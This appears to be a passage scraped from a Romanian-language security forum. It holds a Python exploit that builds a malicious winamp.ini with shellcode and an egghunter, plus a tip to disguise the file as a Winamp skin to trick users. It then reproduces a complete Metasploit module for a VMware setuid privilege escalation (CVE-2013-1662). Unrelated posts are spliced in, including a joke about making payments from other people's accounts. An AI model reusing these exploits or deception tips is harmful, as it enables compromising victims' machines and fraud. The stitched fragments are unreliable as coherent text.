"\x06\x6c\x04\xc3\x4a\x85\x9f\xa1\x42\xaa\x28\x0f\xb4\x85" + "\xa9\xa1\x78\x49\x69\xa3\x04\x90\xbe\x03\x35\x5b\xb3\x42" + "\x72\x86\x3c\x16\x2b\xcc\xef\x87\x58\x90\x33\xa9\x8e\x9e" + "\x0c\xd1\xab\x61\xf8\x6b\xb2\xb1\x51\xe7\xfc\x29\xd9\xaf" + "\xdc\x48\x0e\xac\x20\x02\x3b\x07\xd3\x95\xed\x59\x1c\xa4" + "\xd1\x36\x23\x08\xdc\x47\x64\xaf\x3f\x32\x9e\xd3\xc2\x45" + "\x65\xa9\x18\xc3\x7b\x09\xea\x73\x5f\xab\x3f\xe5\x14\xa7" + "\xf4\x61\x72\xa4\x0b\xa5\x09\xd0\x80\x48\xdd\x50\xd2\x6e" + "\xf9\x39\x80\x0f\x58\xe4\x67\x2f\xba\x40\xd7\x95\xb1\x63" + "\x0c\xaf\x98\xe9\xd3\x3d\xa7\x57\xd3\x3d\xa7\xf7\xbc\x0c" + "\x2c\x98\xbb\x90\xe7\xdc\x34\xdb\xa5\x75\xdd\x82\x3c\xc4" + "\x80\x34\xeb\x0b\xbd\xb6\x19\xf4\x3a\xa6\x68\xf1\x07\x60" + "\x81\x8b\x18\x05\xa5\x38\x18\x0c\xc6\xd3\x82\x81\x6d\x54" + "\x2e\xfe\x42\xc7\x90\x90\xf9\x73\xf1\x19\x72\x19\x83\xc1" + "\x15\x98\x0e\x63\xbb\x7a\x81\x23\x30\x08\x56\x94\xc4\x8a" + "\xb8\xfb\x69\x17\xfd\x23\x4f\xb1\xdd\x4d\xea\xc9\x3d\xfe" + "\x9b\x52\x5f\x92\x04\xe7\xf0\x1f\xba\x27\x4e\x84\x57\x41" + "\x3e\x2d\xd4\xe5\xcc\xcc\x6e\x69\x43\x7c\xae\x14\xda\xef" + "\xcf\xb8\x3c\xdf\x4e\x01\x79\x1f" ) # http://shell-storm.org/shellcode/files/shellcode-739.php sccalc = (b"\x31\xC9"+ # xor ecx,ecx "\x51"+ # push ecx "\x68\x63\x61\x6C\x63"+ # push 0x636c6163 "\x54"+ # push dword ptr esp "\xB8\xC7\x93\xC2\x77"+ # mov eax,0x77c293c7 "\xFF\xD0" ) if len(sys.argv) < 2: usage() exit(1) try: opts, args = getopt.getopt(sys.argv[1:],'p:') except getopt.GetoptError: usage() exit(1) for opt, arg in opts: if opt == '-p': if arg == 'user': shellcode = "aymnaymn" + "\x90" + "\x90" * 100 + scadduser + "\x90" * 89 elif arg == "calc": shellcode = "aymnaymn" + b"\x90" * 452 + b"\x90" + sccalc + b"\x90" * 23 else: print("Error: Invalid payload.\n") usage() sys.exit() #print(str(len(shellcode))) egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"+ "\xef\xb8\x61\x79\x6d\x6e\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") sploit = ( # Unicode-friendly venetian egghunter writer # Setup Registers "\x50\x72\x50"+ # push eax twice "\x72" + # align "\x59\x72\x5f"+ # pop ecx pop edi "\x72" + "\x05\xc2\x02\x01"+ # 05 00020001 ADD EAX,1000200 "\x72"+ "\x2d\xc2\x01\x01"+ # 2D 00010001 SUB EAX,1000100 # EAX is now EAX+100 "\x72\x48"+ # dec eax 4 times "\x72\x48"+ "\x72\x48"+ "\x72\x48\x72"+ # Pave Ahead # write NOPs in locations that will stop later execution "\xc3\x86\xc2\x90"+ # C600 90 MOV BYTE PTR DS:[EAX],90 "\x72\x40\x72"+ # 40 INC EAX "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc2\x91" # 91 XCHG EAX,ECX "\x72" + # align # Start writing egghunter shellcode, EGG = aymn "\xc3\x86\x66"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x81"+ #81 "\x72\x40\x72"+ "\xc3\x86\xc3\x8a"+ #ca "\x72\x40\x72"+ "\xc3\x86\xc3\xbf"+ "\x72\x40\x72"+ "\xc3\x86\x0f"+ "\x72\x40\x72"+ "\xc3\x86\x42"+ # 42 "\x72\x40\x72"+ "\xc3\x86\x52"+ "\x72\x40\x72"+ "\xc3\x86\x6a"+ "\x72\x40\x72"+ "\xc3\x86\x02"+ "\x72\x40\x72"+ "\x34" * 4 + # Padding "\xc3\xb0\x30"+ # 0x003000F0 CALL EAX winamp.exe WinXP Pro SP3 # Note: If you add winamp as an exception to DEP the return address becomes 0x003100F0 instead of 0x003000F0 "\x72" "\xc3\x86\x58"+ #58 "\x72\x40\x72"+ "\xc3\x86\xc3\x8d"+ #cd "\x72\x40\x72"+ "\xc3\x86\x2e"+ #2e "\x72\x40\x72"+ "\xc3\x86\x3c"+ # 3c "\x72\x40\x72"+ "\xc3\x86\x05"+ # 5 "\x72\x40\x72"+ "\xc3\x86\x5a"+ "\x72\x40\x72"+ "\xc3\x86\x74"+ "\x72\x40\x72"+ "\xc3\x86\xc3\xaf"+ # ef "\x72\x40\x72"+ "\xc3\x86\xc2\xb8"+ "\x72\x40\x72"+ "\xc3\x86\x61"+ "\x72\x40\x72"+ "\xc3\x86\x79"+ "\x72\x40\x72"+ "\xc3\x86\x6d"+ "\x72\x40\x72"+ "\xc3\x86\x6e"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x8b"+ "\x72\x40\x72"+ "\xc3\x86\xc3\xba"+ #fa "\x72\x40\x72"+ "\xc3\x86\xc2\xaf"+ # af "\x72\x40\x72"+ "\xc3\x86\x75"+ #75 "\x72\x40\x72"+ "\xc3\x86\xc3\xaa"+ #ea "\x72\x40\x72"+ "\xc3\x86\xc2\xaf"+ # af "\x72\x40\x72"+ "\xc3\x86\x75"+ #75 "\x72\x40\x72"+ "\xc3\x86\xc3\xa7"+ # e7 "\x72\x40\x72"+ "\xc3\x86\xc3\xbf"+ # ff "\x72\x40\x72"+ "\xc3\x86\xc3\xa7"+ # e7 "\x72"+ "\x57"+ # 57 PUSH EDI "\x72"+ # align "\xc3\x83"+ # C3 RETN "\x34" * 200 # Padding ) winamp = ("[Winamp]\r\nutf8=1\r\n" + "skin=" + sploit + "\r\n" "[WinampReg]\r\nIsFirstInst=0\r\nNeedReg=0\r\n" + "[in_wm]\r\nnumtypes=7\r\n" + "type0=WMA\r\ndescription0=Windows Media Audio File (*.WMA)\r\n" + "protocol0=0\r\navtype0=0\r\n" + "type1=WMV\r\ndescription1=Windows Media Video File (*.WMV)\r\n" + "protocol1=0\r\navtype1=1\r\ntype2=ASF\r\n" + "description2=Advanced Streaming Format (*.ASF)\r\n" + "protocol2=0\r\navtype2=1\r\ntype3=MMS://\r\n" + "description3=Windows Media Stream\r\nprotocol3=1\r\n" + "avtype3=1\r\ntype4=MMSU://\r\n" "description4=Windows Media Stream\r\nprotocol4=1\r\n" + "avtype4=1\r\ntype5=MMST://\r\n" + "description5=Windows Media Stream\r\nprotocol5=1\r\n" + "avtype5=1\r\ntype5=" + "\x90\x90\xe9\x0f" + "\r\ndescription6=" + shellcode + "\r\nprotocol6=0\r\navtype6=0\r\n") #f = open(appdata + "\Winamp\winamp.ini", "wb") or sys.exit("Error creating winamp.ini") f = open("winamp.ini", "wb") or sys.exit("Error creating winamp.ini") f.write(winamp) f.close() print("winamp.ini written, copy it into %APPDATA%\\Winamp") Sursa: WinAmp 5.63 (winamp.ini) - Local Exploit Pe Windows 7 nu mi-a mers. O sa incerc pe XP. Sugestie: Redenumiti fisierul in ".wsz" (Winamp Skin). Daca cineva da dublu click pe el, o sa il intrebe daca instaleaza skin-ul si ar trebui... sa se execute shellcode-ul. Si e posibil sa convingi pe cineva sa instaleze un nou skin de Winamp.

Pastreaza-le. Ban permanent, fara conturi de pe sisteme de plati sau banci.

VMWare Setuid vmware-mount Unsafe popen(3) Authored by Tavis Ormandy, egypt | Site metasploit.com VMWare Workstation (up to and including 9.0.2 build-1031769) and Player have a setuid executable called vmware-mount that invokes lsb_release in the PATH with popen(3). Since PATH is user-controlled, and the default system shell on Debian-derived distributions does not drop privs, we can put an arbitrary payload in an executable called lsb_release and have vmware-mount happily execute it as root for us. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' class Metasploit4 < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::Common include Msf::Post::File def initialize(info={}) super( update_info( info, { 'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3)', 'Description' => %q{ VMWare Workstation (up to and including 9.0.2 build-1031769) and Player have a setuid executable called vmware-mount that invokes lsb_release in the PATH with popen(3). Since PATH is user-controlled, and the default system shell on Debian-derived distributions does not drop privs, we can put an arbitrary payload in an executable called lsb_release and have vmware-mount happily execute it as root for us. }, 'License' => MSF_LICENSE, 'Author' => [ 'Tavis Ormandy', # Vulnerability discovery and PoC 'egypt' # Metasploit module ], 'Platform' => [ 'linux' ], 'Arch' => ARCH_X86, 'Targets' => [ [ 'Automatic', { } ], ], 'DefaultOptions' => { "PrependSetresuid" => true, "PrependSetresgid" => true, }, 'Privileged' => true, 'DefaultTarget' => 0, 'References' => [ [ 'CVE', '2013-1662' ], [ 'OSVDB', '96588' ], [ 'BID', '61966'], [ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ], [ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ] ], 'DisclosureDate' => "Aug 22 2013" } )) # Handled by ghetto hardcoding below. deregister_options("PrependFork") end def check if setuid?("/usr/bin/vmware-mount") CheckCode::Vulnerable else CheckCode::Safe end end def exploit unless check == CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid") end # Ghetto PrependFork action which is apparently only implemented for # Meterpreter. # XXX Put this in a mixin somewhere # if(fork()) exit(0); # 6A02 push byte +0x2 # 58 pop eax # CD80 int 0x80 ; fork # 85C0 test eax,eax # 7406 jz 0xf # 31C0 xor eax,eax # B001 mov al,0x1 # CD80 int 0x80 ; exit exe = generate_payload_exe( :code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded ) write_file("lsb_release", exe) cmd_exec("chmod +x lsb_release") cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount") # Delete it here instead of using FileDropper because the original # session can clean it up cmd_exec("rm -f lsb_release") end def setuid?(remote_file) !!(cmd_exec("test -u /usr/bin/vmware-mount && echo true").index "true") end end Sursa: VMWare Setuid vmware-mount Unsafe popen(3) ? Packet Storm

Da, Intel, cu procesoarele lor CISC (Complex instruction set computing) incearca sa se bage peste ARM, care sunt procesoare RISC (Reduced instruction set computing). Acum problema se pune astfel: putere (Intel) sau consum mic (ARM)? Nu m-ar deranja un Intel Atom pe telefon, insa m-ar deranja ca bateria sa ma tina 2 ore.

Sau cititi asta: Files ? Packet Storm Si faceti cateva plati de pe conturile altora, luati-va o ciocolata

Faceti-le disclosure la alea duplicate. Mai exact, nu cred ca le ia lor 2 ani sa repare un XSS. Deci de multe ori nu cred ca e vorba de vreun duplicat. Ameninta ca il faci public, vezi macar ce zic.

memcpy((void *)(1<<12), &patch_current, 1024);